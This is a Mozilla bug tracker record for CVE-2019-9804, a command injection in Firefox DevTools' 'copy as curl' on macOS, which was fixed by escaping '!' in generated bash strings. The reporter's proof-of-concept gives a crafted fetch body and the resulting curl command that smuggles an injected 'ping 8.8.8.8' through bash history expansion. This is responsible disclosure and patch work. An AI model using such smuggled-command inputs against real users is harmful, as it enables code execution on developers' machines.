Closed Bug 1518026 (CVE-2019-9804) Opened 6 years ago Closed 6 years ago

RCE via "copy as curl" on mac

Categories

(DevTools :: Netmonitor, defect)

Product:
DevTools
Component:
Netmonitor
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

(firefox-esr60 wontfix, firefox64 wontfix, firefox65 wontfix, firefox66 verified)

Status:
VERIFIED FIXED
Milestone:
Firefox 66
Tracking Flags:
Tracking Status
firefox-esr60 --- wontfix
firefox64 --- wontfix
firefox65 --- wontfix
firefox66 --- verified

People

(Reporter: watashiwaher, Assigned: bgrins)

References

Details

(4 keywords, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][adv-main66+])

Attachments

(2 files)

curl.zip
7.43 MB, application/zip
Details
Bug 1518026 - Escape '!' to '\041' in posix strings ($'...');r=Honza
47 bytes, text/x-phabricator-request
Details | Review
Attached file curl.zip 
VULNERABILITY DETAILS
Copypasting of curl requests from Firefox can produce RCE in MacOS.

For example we have such JS code:
fetch('https://google.com', {'body':'\'!ls:q:gs|ls|;ping 8.8.8.8;|', method:'POST'})

If we will copy it as curl we will get such bash command:
curl 'https://google.com/' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'content-type: text/plain;charset=UTF-8' -H 'origin: null' -H 'DNT: 1' -H 'Connection: keep-alive' --data $'\'!ls:q:gs|ls|;ping 8.8.8.8;|'

The interesting part is here:
$'\'!ls:q:gs|ls|;ping 8.8.8.8;|'

It is calling following command:
ping 8.8.8.8

But how?
The problem that mac uses old bash, and there is lack of some updates. And current mac version of bash has a problem with bash history expansions.

Our bash command will be actually interpreted interesting if some of our previous commands contained 'ls'. So we will have such request:
curl 'https://google.com/' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'content-type: text/plain;charset=UTF-8' -H 'origin: null' -H 'DNT: 1' -H 'Connection: keep-alive' --data $'\'';ping 8.8.8.8;''

Interesting part is here:
$'\'';ping 8.8.8.8;''

So you see that here our string transformed into executable bash code.


WHATS HAPPEN
First of all when I found this, I asked to fix it bash team, but they told me that it is not a vulnerability at all, so there is no CVE, and that it is fixed in newer bash (it is true), and they won't fix it for old versions.
Okay, I sent this information to Apple, and they fixed it... But I was slow and didn't check there fix. But later I checked fix. And the fix was strange... They fixed Safari inspector. So it looks like Apple actually doesn't think that it is a problem in Bash as I inderstand.
So I am sending report to Firefox team.


VERSION
Works only in MacOS in any version of Firefox.


REPRODUCTION CASE
I attached archieve with video showcase and HTML file.
Flags: sec-bounty?
Flags: needinfo?(watashiwaher)
Flags: needinfo?(watashiwaher)
Thanks for this report.

Does this also work in Chrome's devtools, and did you report to them (if so, can you provide the URL)? Do you know if there is a (public or private) URL for the safari/mac "fix"?

Honza, are you the right person to look at this?
Component: Security → Netmonitor
Flags: needinfo?(watashiwaher)
Flags: needinfo?(odvarko)
Product: Firefox → DevTools
"Does this also work in Chrome's devtools, and did you report to them"
Yes it works, but I made report yesterday for both: Firefox and Chrome. So it is not public yet.

"Do you know if there is a (public or private) URL for the safari/mac "fix"?"
For Safari:
https://support.apple.com/en-us/HT208324

WebKit Web Inspector
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A command injection issue existed in Web Inspector. This issue was addressed through improved escaping of special characters.
CVE-2017-7161: Mitin Svyat

I looked at fix (sorry for too late). In Safari interesting part transformes in:
$'\'\041ls:q:gs|ls|;ping 8.8.8.8;|'
Flags: needinfo?(watashiwaher)
(In reply to potatoe from comment #2)
> "Does this also work in Chrome's devtools, and did you report to them"
> Yes it works, but I made report yesterday for both: Firefox and Chrome. So
> it is not public yet.

OK, can you provide the link for completeness? We may be able to coordinate with Chrome, though if the fix for Safari is already public it might not matter very much anymore...
Here is a link (but it is private now).
https://bugs.chromium.org/p/chromium/issues/detail?id=919356
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: csectype-priv-escalation, sec-moderate, sec-vector
See Also: → https://bugs.chromium.org/p/chromium/issues/detail?id=919356

I'm assuming this was the fix in Web Inspector: https://github.com/WebKit/webkit/commit/5736bda9ad07609ef386e2d5a7f5308c17b98586.

I can't find any reference to a commit from https://support.apple.com/en-us/HT208324, or a commit with the the CVE ID.

Scanning our netmonitor code for "copy as curl", this looks like the relevant function: https://searchfox.org/mozilla-central/rev/b29663c6c9c61b0bf29e8add490cbd6bad293a67/devtools/client/shared/curl.js#348

I've ported over the WebInspector fix in attachment 9036477 [details]

https://hg.mozilla.org/integration/autoland/rev/10d517464fb1ba1ea73ddcaea039e32f4f4116f6
https://hg.mozilla.org/mozilla-central/rev/10d517464fb1

Group: firefox-core-security → core-security-release
Status: NEW → RESOLVED
Closed: 6 years ago
status-firefox66: --- → fixed
Resolution: --- → FIXED
Target Milestone: --- → Firefox 66

Too late for Fx65 in light of tomorrow's RC gtb. Let's let this ride the trains with 66.

Assignee: nobody → bgrinstead
status-firefox64: --- → wontfix
status-firefox65: --- → wontfix
status-firefox-esr60: --- → affected
Flags: in-testsuite+
Flags: needinfo?(odvarko)
Flags: sec-bounty? → sec-bounty+
Flags: qe-verify+
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]]

I have managed to reproduce the issue mentioned in comment 0 using Firefox 65.0.1 (BuildId:20190211233335).

This issue is verified fixed using Firefox 66.0b9 (BuildId:20190218131312) on macOS 10.12.6

Status: RESOLVED → VERIFIED
status-firefox66: fixedverified
Flags: qe-verify+

Daniel, do you think we should uplift this to ESR for the 60.6 release?

Flags: needinfo?(dveditz)

I don't feed strongly about it. It's a simple fix that release-drivers would probably take, but how many people are doing web development on ESR, let alone on ESR on mac?

Flags: needinfo?(dveditz)

(In reply to Daniel Veditz [:dveditz] from comment #13)

I don't feed strongly about it. It's a simple fix that release-drivers would probably take, but how many people are doing web development on ESR, let alone on ESR on mac?

That's a good point. Given that this is DevTools + OSX only, I'm leaning towards not taking the resources required to get this uplifted and tested onto 60.

status-firefox-esr60: affectedwontfix
Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][adv-main66+]
Alias: CVE-2019-9804

Is the report to Bash in a public report somewhere? I'd like to link to it.

Flags: needinfo?(watashiwaher)

Seems like noooo.

Flags: needinfo?(watashiwaher)
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: